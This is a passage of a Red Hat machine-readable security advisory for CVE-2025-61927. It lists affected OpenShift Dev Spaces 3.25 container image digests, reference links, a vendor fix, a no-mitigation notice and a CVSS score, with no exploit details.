"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:29fa5d30eafda6658cf2c4a655e82e075b5708ddc1ff1b6d27c082f96c33a95d_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:56bed332699e952d3b4f4672420c379fa32954e77bb24aa3fec51823a0473703_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:8714c6e69cdc81f39c44a4d17dda5a4574e104eafeb6d3deb5f29b879e5f0f99_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:94a3bd9690ce19b7dcab8784e9edaf39a52085d84561659b5ea2e955d375f37e_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:296a441f00d4749301a9aee06a998f29ac64bb9c50d7e090711b33776a845f03_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:4ea445ee2670945ac2be3fe503be6f44d4ff4a953deffe9dc61fb4a8a30ae5a8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:84b61272c472cee00404abd49080bd492dbe63a72ebc9bdcef48dac74b72b455_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:cca33584e4afced97c7c3c35af261890279a540df0f2da4d263e8862e2c14c6c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:31e999abdb05d9dd572f21a91982bc8bfbb2007f1100650715c51d40f6f1f312_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:5b136fff0f0c8ff4d56fdb934eef1dd7d04ebdac13e7cb8c1e020bf370f4df84_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:8642741c5122757b5a01ee03e5a514a4d49b4048c6808b14ab5f8b7cece82d11_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:a353e11c2f965642a1107d7b764edccd0888009fc991ec066fb40e4632692ac4_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:10821feaf0ba17ef30f0403d29862004615952e289af23794e15d3354bc4f288_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:4cba254ffcbe10a9da41c2b25cdb098824d3adfc207ce02f5c71200bd41c6959_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f67c1d7d8549587c1032404411b01472f71e775a7bbfd91927060c1b09a631c0_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fb455374d650d93bbc4eca5616d041067cf1bcebc0dd6d0a92d8af16e2656708_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:3a3da41883a104931b483ce6f5ff089a7fe3fa7b409a0b66ec1d8d396903f246_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:5898927ebcb955afdf51695a028b2e3fe4dfb08fb12d3e4daa75d1266562bdf9_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:eec12e74a1bf7348f827b6c49d97f8cf9d27199ce2d35330f92ae3330020785f_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:f7dbf103ed9452b48a61505498c8aa1e4f445e9bf40b62769fb16372597982d2_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:53eb58d4a5f32aa71bb7e0d3beedca005b0b68f1fa9f18e07d08e243a803a565_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:63833e84093a729b0624238325e783fbcb1e22a7649dc1b59998bcce6ac450ef_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:a63f6e4ee48aaf257c592844674621110d1380f51d53d5bbf796b3bcafb67b89_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:d50d87f4bbcabaa25d7b8a4c09d956d0d8eec926bd1c01fa1a506266e2056162_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:1669477977f4722f931dba2693089f59ab77b5828869ec188e0bbff4966d7605_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5411419f1400a2e1345d430df21d5b6ae9fc00d99a89549d7bf889e82a8f350b_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:782034bb77a0657bd9515feff4d7cb31e259dae24ed322e350022fd901fb5187_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b8439f99e641c9f04e10a97f9a593b3909968ebd293381af2885b2b4ca7ac3e0_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:0b5b29e3626d7796c6a7ab73296934fd13717ca217e1bd42dc2ac39b0efdbf8a_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:72e67f67750d8cdb639ab2fc274063e622075e00ceda667a89b54c6e0d8de955_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:8a19af8b03b59562335b3a3f77753944c27ecbccaeda3400d0f089a6cd8d11fa_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:ef84715a61474b7a45b0b24c0d30370f51ab93ff86b70d5d345545253e01c3ae_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61927"
},
{
"category": "external",
"summary": "RHBZ#2403177",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2403177"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61927",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61927"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61927",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61927"
},
{
"category": "external",
"summary": "https://github.com/capricorn86/happy-dom/commit/819d15ba289495439eda8be360d92a614ce22405",
"url": "https://github.com/capricorn86/happy-dom/commit/819d15ba289495439eda8be360d92a614ce22405"
},
{
"category": "external",
"summary": "https://github.com/capricorn86/happy-dom/security/advisories/GHSA-37j7-fg3j-429f",
"url": "https://github.com/capricorn86/happy-dom/security/advisories/GHSA-37j7-fg3j-429f"
}
],
"release_date": "2025-10-10T19:38:19.835000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-12-15T21:46:21+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:3e6de411cafc0aee65b36541803bebc84070ff69bab6f3f4691d65074fe36307_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:44c8d3d034803b0f8307b56cafdfcf8083071e407139e701456acfb2e434b0c8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:821f997cae0acae9048347c648c4f762a870b6548b8b7d14129315bf85b97276_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9ebbe3422e8100ef6e9c8ca7896ca21227ae4c708f3d3321fa2ca1c8eb9f051_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:23225"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:46811ca65f64fb6d260e3dca253947c749b6dd31ce3185f36e729ea817f454a4_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:65b5989d68b4489a7d1b915870afc49c0f977b9690ee958be7e8fedcc611087f_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:7d38a9fe7e1bf493f235c62ebaabdc1c805b94e731186b9ffa56cf581abc8f77_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:869bac1a7cc51c0a780667abd7b47f9e42f2da22e6d6a57b5a1d7ecdeddcee7c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0a15c7b78d69e8711f81727879c1d4bbd8c2e8547a0b5c84513ea3a42fb5f8f3_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e34005d1fc54aaf8863c5f0bf4bdd30120e65df1a61a6e775f0998e0be152582_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e381c47978265d9db3daf279657a63cfe8f1f5afe0d00d4792b819cbae480338_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:fdbae1704685d51d583b0c2e588ddf3b088b78cc84b239821421042c0943c098_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:969198cbaa319f55733ae4fb378b867f8afb9d1bfe78dfce65b20fd7ac9fb541_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:a1ccad11e91784e0b6ed9eb1745d86c8783f1e869096a7f735f47280df0acc4e_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:b2c13795589df33fec7a6c6b5ed37e11db14f134bfcc7ee0350e3df372f5da88_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:e6f11881adb8f1675e5e3372339e648d99084d7d3f244d0de1eeebc96ed08dfc_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:6137931395a4cbfa07e5579172ed579babd14a2d1e054238298eee1aee4e2c07_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:804b00736484cc574e738130b9dc0e553828f54705fed29dbd9bb873bc5d1baa_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:8cf6cd46eef5fea2e500e14b18a8ec545b5bec93e6fb2289a9d760d56e4b52bb_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:d17a2f913e7cef538d6537d0ad32e257e2d51c871fc66183ea291024e8e2afae_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:74b83b79cba88af0545e7fb52dd70df2c1b96cf23b8963517fc779fbfe3e9aac_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:46948834924666487d7f47ac11bed7655e936fdb7071ee32d1ae3b1bb1a69aa4_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:690264c2631bd5a2341b37c1d3099a84e9bfb5eb2afab2937c0453a2475d0111_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a4417f71e76b15d9c4f1c4657b2e5f2bb3979d498b362b42d9b207e37bf505d5_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:c7871f233d3908f052954b132aa6c7b57c500e41899f02ac023098e2283380c5_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:70d4bfd4a877934fbdded33e39c349b3554bc371492ee2696260916b0119efcf_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:859b5a54204008d575e774ca4794c346c0195750b5617ae56dccaf3dfa3d3f1b_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:bc65597fade1fd7de78ab27d9b0ba1bf5317b56949a9277e0af4b32db1aaee48_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:cfa0ae37ba69921586906f410956f9cd7d4a27652a544d3363c7d2dc92603286_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:29fa5d30eafda6658cf2c4a655e82e075b5708ddc1ff1b6d27c082f96c33a95d_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:56bed332699e952d3b4f4672420c379fa32954e77bb24aa3fec51823a0473703_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:8714c6e69cdc81f39c44a4d17dda5a4574e104eafeb6d3deb5f29b879e5f0f99_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:94a3bd9690ce19b7dcab8784e9edaf39a52085d84561659b5ea2e955d375f37e_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:296a441f00d4749301a9aee06a998f29ac64bb9c50d7e090711b33776a845f03_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:4ea445ee2670945ac2be3fe503be6f44d4ff4a953deffe9dc61fb4a8a30ae5a8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:84b61272c472cee00404abd49080bd492dbe63a72ebc9bdcef48dac74b72b455_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:cca33584e4afced97c7c3c35af261890279a540df0f2da4d263e8862e2c14c6c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:31e999abdb05d9dd572f21a91982bc8bfbb2007f1100650715c51d40f6f1f312_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:5b136fff0f0c8ff4d56fdb934eef1dd7d04ebdac13e7cb8c1e020bf370f4df84_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:8642741c5122757b5a01ee03e5a514a4d49b4048c6808b14ab5f8b7cece82d11_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/openvsx-rhel9@sha256:a353e11c2f965642a1107d7b764edccd0888009fc991ec066fb40e4632692ac4_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:10821feaf0ba17ef30f0403d29862004615952e289af23794e15d3354bc4f288_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:4cba254ffcbe10a9da41c2b25cdb098824d3adfc207ce02f5c71200bd41c6959_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:f67c1d7d8549587c1032404411b01472f71e775a7bbfd91927060c1b09a631c0_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/pluginregistry-rhel9@sha256:fb455374d650d93bbc4eca5616d041067cf1bcebc0dd6d0a92d8af16e2656708_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:3a3da41883a104931b483ce6f5ff089a7fe3fa7b409a0b66ec1d8d396903f246_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:5898927ebcb955afdf51695a028b2e3fe4dfb08fb12d3e4daa75d1266562bdf9_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:eec12e74a1bf7348f827b6c49d97f8cf9d27199ce2d35330f92ae3330020785f_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/server-rhel9@sha256:f7dbf103ed9452b48a61505498c8aa1e4f445e9bf40b62769fb16372597982d2_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:3e6de411cafc0aee65b36541803bebc84070ff69bab6f3f4691d65074fe36307_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:44c8d3d034803b0f8307b56cafdfcf8083071e407139e701456acfb2e434b0c8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:821f997cae0acae9048347c648c4f762a870b6548b8b7d14129315bf85b97276_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/traefik-rhel9@sha256:e9ebbe3422e8100ef6e9c8ca7896ca21227ae4c708f3d3321fa2ca1c8eb9f051_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:53eb58d4a5f32aa71bb7e0d3beedca005b0b68f1fa9f18e07d08e243a803a565_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:63833e84093a729b0624238325e783fbcb1e22a7649dc1b59998bcce6ac450ef_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:a63f6e4ee48aaf257c592844674621110d1380f51d53d5bbf796b3bcafb67b89_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel10@sha256:d50d87f4bbcabaa25d7b8a4c09d956d0d8eec926bd1c01fa1a506266e2056162_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:1669477977f4722f931dba2693089f59ab77b5828869ec188e0bbff4966d7605_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:5411419f1400a2e1345d430df21d5b6ae9fc00d99a89549d7bf889e82a8f350b_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:782034bb77a0657bd9515feff4d7cb31e259dae24ed322e350022fd901fb5187_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-base-rhel9@sha256:b8439f99e641c9f04e10a97f9a593b3909968ebd293381af2885b2b4ca7ac3e0_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:0b5b29e3626d7796c6a7ab73296934fd13717ca217e1bd42dc2ac39b0efdbf8a_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:72e67f67750d8cdb639ab2fc274063e622075e00ceda667a89b54c6e0d8de955_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:8a19af8b03b59562335b3a3f77753944c27ecbccaeda3400d0f089a6cd8d11fa_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/udi-rhel9@sha256:ef84715a61474b7a45b0b24c0d30370f51ab93ff86b70d5d345545253e01c3ae_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 8.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:L",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:46811ca65f64fb6d260e3dca253947c749b6dd31ce3185f36e729ea817f454a4_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:65b5989d68b4489a7d1b915870afc49c0f977b9690ee958be7e8fedcc611087f_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:7d38a9fe7e1bf493f235c62ebaabdc1c805b94e731186b9ffa56cf581abc8f77_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-rhel9@sha256:869bac1a7cc51c0a780667abd7b47f9e42f2da22e6d6a57b5a1d7ecdeddcee7c_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:0a15c7b78d69e8711f81727879c1d4bbd8c2e8547a0b5c84513ea3a42fb5f8f3_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e34005d1fc54aaf8863c5f0bf4bdd30120e65df1a61a6e775f0998e0be152582_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:e381c47978265d9db3daf279657a63cfe8f1f5afe0d00d4792b819cbae480338_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/code-sshd-rhel9@sha256:fdbae1704685d51d583b0c2e588ddf3b088b78cc84b239821421042c0943c098_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:969198cbaa319f55733ae4fb378b867f8afb9d1bfe78dfce65b20fd7ac9fb541_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:a1ccad11e91784e0b6ed9eb1745d86c8783f1e869096a7f735f47280df0acc4e_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:b2c13795589df33fec7a6c6b5ed37e11db14f134bfcc7ee0350e3df372f5da88_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/configbump-rhel9@sha256:e6f11881adb8f1675e5e3372339e648d99084d7d3f244d0de1eeebc96ed08dfc_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:6137931395a4cbfa07e5579172ed579babd14a2d1e054238298eee1aee4e2c07_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:804b00736484cc574e738130b9dc0e553828f54705fed29dbd9bb873bc5d1baa_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:8cf6cd46eef5fea2e500e14b18a8ec545b5bec93e6fb2289a9d760d56e4b52bb_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/dashboard-rhel9@sha256:d17a2f913e7cef538d6537d0ad32e257e2d51c871fc66183ea291024e8e2afae_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-operator-bundle@sha256:74b83b79cba88af0545e7fb52dd70df2c1b96cf23b8963517fc779fbfe3e9aac_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:46948834924666487d7f47ac11bed7655e936fdb7071ee32d1ae3b1bb1a69aa4_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:690264c2631bd5a2341b37c1d3099a84e9bfb5eb2afab2937c0453a2475d0111_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:a4417f71e76b15d9c4f1c4657b2e5f2bb3979d498b362b42d9b207e37bf505d5_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/devspaces-rhel9-operator@sha256:c7871f233d3908f052954b132aa6c7b57c500e41899f02ac023098e2283380c5_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:70d4bfd4a877934fbdded33e39c349b3554bc371492ee2696260916b0119efcf_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:859b5a54204008d575e774ca4794c346c0195750b5617ae56dccaf3dfa3d3f1b_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:bc65597fade1fd7de78ab27d9b0ba1bf5317b56949a9277e0af4b32db1aaee48_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/imagepuller-rhel9@sha256:cfa0ae37ba69921586906f410956f9cd7d4a27652a544d3363c7d2dc92603286_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:29fa5d30eafda6658cf2c4a655e82e075b5708ddc1ff1b6d27c082f96c33a95d_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:56bed332699e952d3b4f4672420c379fa32954e77bb24aa3fec51823a0473703_s390x",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:8714c6e69cdc81f39c44a4d17dda5a4574e104eafeb6d3deb5f29b879e5f0f99_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/jetbrains-ide-rhel9@sha256:94a3bd9690ce19b7dcab8784e9edaf39a52085d84561659b5ea2e955d375f37e_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:296a441f00d4749301a9aee06a998f29ac64bb9c50d7e090711b33776a845f03_ppc64le",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:4ea445ee2670945ac2be3fe503be6f44d4ff4a953deffe9dc61fb4a8a30ae5a8_amd64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:84b61272c472cee00404abd49080bd492dbe63a72ebc9bdcef48dac74b72b455_arm64",
"Red Hat OpenShift Dev Spaces (RHOSDS) 3.25:registry.redhat.io/devspaces/machineexec-rhel9@sha256:cca33584e4afced97c7c3c35af261890279a540df0f2da4d263e8862e2c14c6c_s390x",
